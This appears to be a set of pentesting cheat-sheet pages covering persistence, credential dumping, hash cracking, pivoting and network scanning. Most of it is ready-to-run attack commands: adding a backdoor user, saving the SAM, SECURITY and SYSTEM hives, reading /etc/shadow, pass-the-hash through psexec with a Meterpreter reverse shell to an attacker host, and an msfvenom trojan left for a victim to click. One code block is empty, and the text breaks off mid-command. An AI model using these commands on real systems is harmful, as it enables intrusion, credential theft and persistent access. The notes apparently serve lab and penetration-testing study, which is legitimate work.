/post-exploitation/maintaining-access.md:
--------------------------------------------------------------------------------
# Maintaining Access

## Maintaining Access Overview

### Persistence Scripts

* Run `persistence -h`
* `exploit/windows/local/persistence`
* `exploit/windows/local/registry_persistence`

### Scheduled Tasks

* Run `scheduleme`
* Run `schtaskabuse`

### Add a User

* `net user hacker password123 /add`
--------------------------------------------------------------------------------
/post-exploitation/passwords.md:
--------------------------------------------------------------------------------
# Passwords

## Obtaining Windows Passwords

Windows credentials may come from an Active Directory account or be stored locally. Passwords are stored in two ways: the LAN Manager (LM) password hash and the NT password hash. They are often seen together separated by a colon and known as an NTLM hash pair. Neither is salted. LM hashes are limited to 14 characters.
### Finding Hashes

```bash
net user             # List user accounts
net user <username>  # Get more details of a specific user
```

Credentials are stored in the SAM database and we need to be an Administrator to see it.

```bash
# The SAM file is located in:
dir \windows\system32\config    # But not accessible while the OS is running
# Values are also stored in the registry at:
HKEY_LOCAL_MACHINE\SAM
```

The SAM file is locked while the operating system is running. Instead, while the machine is active, we take a backup of the SAM hive along with the SECURITY and SYSTEM hives.

```bash
reg save hklm\sam sam.save
reg save hklm\security security.save
reg save hklm\system system.save
```

After copying the files over to Kali we can extract the hashes from the SAM database.

```bash
# Using samdump2
samdump2 system.save sam.save
# Using pwdump
pwdump system.save sam.save
# Using secretsdump from Impacket
python secretsdump.py -sam sam.save -system system.save LOCAL
```

If we have a Meterpreter session we can use the `hashdump` command to try to dump the hashes.

### Cracking Hashes

Now that we have a list of hashes we can place the hash output into a file and then attempt to crack them using John the Ripper.

```bash
john myhash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=NT-old
```

Another tool we can use to find and crack hashes is SAMInside (GUI).

### Passing Hashes

Pass-the-Hash is a different kind of authentication attack that allows us to use LM and NT hashes to gain access to a remote Windows host without having to know the actual password.
Example using Metasploit:

```bash
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST <attacker_IP>
msf exploit(psexec) > set LPORT <attacker_port>
msf exploit(psexec) > set RHOST <target_IP>
msf exploit(psexec) > set SMBUser <username>
msf exploit(psexec) > set SMBPass <LM_hash:NT_hash>
msf exploit(psexec) > exploit
```

## Obtaining Linux Passwords

### Finding Hashes

On a standard Linux system the user accounts are stored in the `/etc/passwd` file. There will be an 'x' where the password hash used to be; the hash is now stored in the file `/etc/shadow`.

```bash
cat /etc/passwd
cat /etc/shadow
```

### Cracking Hashes

We can combine the two files to extract the user and password information and then attempt to crack them using John the Ripper.

```bash
unshadow passwd shadow > full.txt
john full.txt --wordlist=/usr/share/wordlists/rockyou.txt
```

## Password Cracking

### Cracking Hashes

#### Crackstation

[https://crackstation.net/](https://crackstation.net/)

#### JohnTheRipper

```bash
john linhash.txt --wordlist=/usr/share/wordlists/rockyou.txt
john --show linhash.txt   # Show already cracked passwords for specific hashes
```

#### Hashcat

```bash
hashcat -m <hash_mode> hash.txt wordlist.txt
```

### Cracking Files

#### Zip

```bash
fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt file.zip
```

#### id\_rsa

```bash
```

### Other

#### Crunch

Crunch can create a wordlist based on criteria you specify. The output from crunch can be sent to the screen, to a file, or to another program.
```bash
crunch 10 10 -t password%%   # Generates a list of 10-character words ending in 00-99
password00
...
password99

crunch 6 6 -t pass@@ -o pass.txt   # Generates a list of 6-character words ending in aa-zz
passaa
...
passzz
```

#### CeWL

CeWL (Custom Word List generator) is a Ruby app which spiders a given URL, up to a specified depth, and returns a list of words which can then be used for password crackers such as John the Ripper. Optionally, CeWL can follow external links.

CeWL can also create a list of email addresses found in mailto links. These email addresses can be used as usernames in brute force actions.

```bash
cewl -w meta.txt -d 3 <url>
```
--------------------------------------------------------------------------------
/post-exploitation/tunneling-and-port-forwarding.md:
--------------------------------------------------------------------------------
# Tunneling and Port Forwarding

## SSH

### Local Port Forwarding

Scenario: when getting a foothold on a target machine, you find a service running on it that is only listening on localhost, so you want to forward it to the attack machine so you can access it.

```bash
# From Kali (Attack Machine)
# Syntax
ssh -L <local_port>:<remote_host>:<remote_port> -l <user> <target_IP>
# Example (from the Pandora machine on HTB)
ssh -L 8888:127.0.0.1:80 -l daniel 10.129.250.50
```

If we look at our local Kali host `http://127.0.0.1:8080`, nothing is currently running there.

Now use SSH to connect to the target server on port 80, but access it on port 8080 locally.

```bash
# From Kali
ssh -f -nNT -L 8080:localhost:80 target_user@target_IP
ssh -f -nNT -L 8080:localhost:80 msfadmin@10.0.2.8
```

We should now be able to navigate to `http://127.0.0.1:8080` and see the target's web page.
We can use `lsof` to kill it: run `lsof -i` and kill the PID of the ssh process.

### Remote Port Forwarding

```bash
# From Target
sudo ssh -R 2222:localhost:22 kali@kali_IP
# From Kali (the forwarded port listens on Kali's loopback)
ssh <target_user>@127.0.0.1 -p 2222
```

Running HTTP through an SSH tunnel:

```bash
# From Target
sudo ssh -f -nNT -R 8080:localhost:80 msfadmin@10.0.2.8
# From Kali
# Can now navigate to 10.0.2.8 in a browser. Was not available prior.
```

### Dynamic Port Forwarding

```bash
# From Kali
ssh -f -N -D 9050 kali@intermediate_IP   # Intermediate host is dual-homed with a second IP of 10.1.1.7
proxychains ssh 10.1.1.5                 # Target IP
```

## Chisel

### Socks Proxy

```bash
# From Kali
chisel server -p 8000 --reverse

# From Target - download the binary for the right platform, i.e. Linux amd64, Windows, etc.
./chisel client 10.50.143.31:8000 R:socks

# And now use proxychains with port 1080 (default)
```

### Port Forwarding

Scenario: when getting a foothold on a target machine, you find a service running on port 8000 that is only listening on localhost, so you want to forward it to the attack machine (also to port 8000) so you can access it.

```bash
# From Kali
chisel server -p 12312 --reverse

# From Target
./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:8000:127.0.0.1:8000
```

## Plink

### Example

Pivoting through Windows-based operating systems.

Scenario: after compromising a Windows server, we discover a mysqld.exe running on port 3306.
```powershell
# From a Windows system shell
# Transfer plink.exe to this Windows system
plink.exe -ssh -l kali -pw kali -R <kali_IP>:<kali_port>:<target_host>:<target_port> <kali_IP>
plink.exe -ssh -l kali -pw kali -R 100.11.0.4:1234:127.0.0.1:3306 10.11.0.4
# From Kali
sudo nmap -sV 127.0.0.1 -p 1234
```

## sshuttle

### Example

> Will only work if SSH is running and will NOT work on Windows machines

```bash
# From Kali
sshuttle -r USER@MACHINE_IP 0.0.0.0/0
```

## Armitage

### Example

```bash
# Set up Meterpreter reverse shell
msfvenom -p windows/meterpreter/reverse_tcp --platform windows --arch x86 -f exe LHOST=<attacker_IP> LPORT=<attacker_port> -o winjan.exe
# From Armitage
# Add target host, select payload, windows, meterpreter, reverse_tcp, remove encoding, and update the port
# Now wait for a victim to click the malicious attachment winjan.exe
# Armitage has detected and exploited it
# Right click on the target to select meterpreter, pivoting, setup, and see additional hosts
# We can now scan the new target(s). Select Hosts, MSFscans, and enter range
```

## Metasploit

### Example

```bash
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set lhost <attacker_IP>
msf > set lport <attacker_port>
msf > exploit
# Now execute the winjan.exe file from the target like with Armitage
# We now have a meterpreter reverse shell and can check the network configuration
meterpreter > shell
C:\tools>ipconfig
exit
meterpreter > background
msf exploit(multi/handler) > use post/multi/manage/autoroute
msf post(multi/manage/autoroute) > set subnet 10.1.1.0
msf post(multi/manage/autoroute) > set session 1
msf post(multi/manage/autoroute) > exploit
# We can now pivot by scanning one of the new targets
msf auxiliary(scanner/ssh/ssh_version) > set rhosts 10.1.1.5
msf auxiliary(scanner/ssh/ssh_version) > exploit
```

## RINETD

### Example

During an assessment, we gained root access to an Internet-connected Linux web server. From there, we found and compromised a Linux client on an internal network, gaining access to SSH credentials.

```bash
# From Kali
# Test network connectivity
kali@kali:~$ ping google.com -c 1
PING google.com (216.58.207.142) 56(84) bytes of data.

# Test connection to found IP
kali@kali:~$ nc -nvv 216.58.207.142 80
(UNKNOWN) [216.58.207.142] 80 (http) open
GET / HTTP/1.0
```

```bash
# Access compromised target via SSH
kali@kali:~$ ssh student@10.11.0.128

# Test network connectivity -- no internet access
student@debian:~$ ping google.com -c 1
(UNKNOWN) [216.58.207.142] 80 (http) : No route to host
```

```bash
# Redirect traffic to our Kali Linux server using RINETD

ss -antp | grep "80"

# From compromised target to Kali Linux
student@debian:~$ nc -nvv 10.11.0.4 80
(UNKNOWN) [10.11.0.4] 80 (http) open
GET / HTTP/1.0
```

## NETSH

### Example

Scenario: we compromised a Windows target through a remote vulnerability and obtained SYSTEM privileges. We find an additional network interface and identify a Windows server that has port 445 open.

```powershell
# From Windows compromised target
netsh interface portproxy add v4tov4 listenport=<port> listenaddress=<local_IP> connectport=<port> connectaddress=<remote_IP>
netsh interface portproxy add v4tov4 listenport=4455 listenaddress=10.11.0.22 connectport=445 connectaddress=192.168.1.110
# Check for listening
netstat -anp TCP | find "4455"
# With admin permissions we can allow the forwarding rule through the firewall
netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=10.11.0.22 localport=4455 action=allow

# From Kali
smbclient -L 10.11.0.22 --port=4455 --user=Administrator
Data
# If an error occurs, we can test interaction
sudo mkdir /mnt/win10_share
sudo mount -t cifs -o port=4455 //10.11.0.22/Data -o username=Administrator,password=Qwerty /mnt/win10_share
ls -l /mnt/win10_share
```
--------------------------------------------------------------------------------
/scanning-and-enumeration/enumeration.md:
--------------------------------------------------------------------------------
# Enumeration

TCM's modified script - [https://pastebin.com/MhE6zXVt](https://pastebin.com/MhE6zXVt)

## Some Steps

1. nmap scan
2. nmap script scan (http, smb, smtp, tftp, etc.)
3. Metasploit enumeration
4. searchsploit / Exploit-DB (others)
5. Google

### Other Tools

* Reconnoitre
* Vanquish
* Sn1per
* SPARTA

## Ping

> When pinging a machine we can infer the OS type from the TTL.
>
> Windows' default TTL is 128, which decreases by 1 each time the packet traverses a router, so look for 127. If it's between 64 and 128, chances are it's Windows.
>
> Linux's default TTL is 64. If it's below 64, chances are it's Linux.
>
> Anything above 128, chances are it's network infrastructure. A Cisco router's default is 255.
--------------------------------------------------------------------------------
/scanning-and-enumeration/network-scanning.md:
--------------------------------------------------------------------------------
# Network Scanning

## nmap

### Examples

```bash
nmap -T4 -p- -oA nmap/tcp_all_ports <target>                        # Scan all TCP ports
nmap -T4 -p- --open -vv -oA nmap/tcp_all_ports_verbose <target>     # Same, but be verbose and show only open ports
nmap -sCV -p <ports> -oA nmap/tcp_def_scripts <target>              # Default scripts and version detection against found ports
nmap --script "*vuln*" -p <ports> -oA nmap/tcp_vuln_scripts <target> # Vuln scripts against found ports
```

### Basic Scans

```bash
nmap <target>       # Basic scan of the top 1000 ports
nmap -p- <target>   # Basic scan of all 65535 ports
nmap -iL <file>     # Input from a list of hosts/networks
nmap -v <target>    # Increase verbosity level (use -vv or more for greater effect)
```

### Host Discovery

```bash
nmap -sn <target>   # Ping scan - disable port scan
nmap -Pn <target>   # Treat all hosts as online -- skip host discovery
```

### Scan Techniques

```bash
nmap -sS <target>   # SYN scan
nmap -sU <target>   # UDP scan
```

### Port Specification

```bash
nmap -p22 <target>          # Scan a specific port
nmap -p22,80,443 <target>   # Scan multiple specific ports
nmap -p1-65535 <target>     # Scan a range of ports
```

### Service/Version & OS Detection

```bash
nmap -sV <target>   # Probe open ports to determine service/version info
nmap -O <target>    # Enable OS detection
nmap -A <target>    # Enable OS detection, version detection, script scanning, and traceroute
```

### Script Scan

```bash
nmap -sC <target>   # equivalent to --script=default
nmap --script=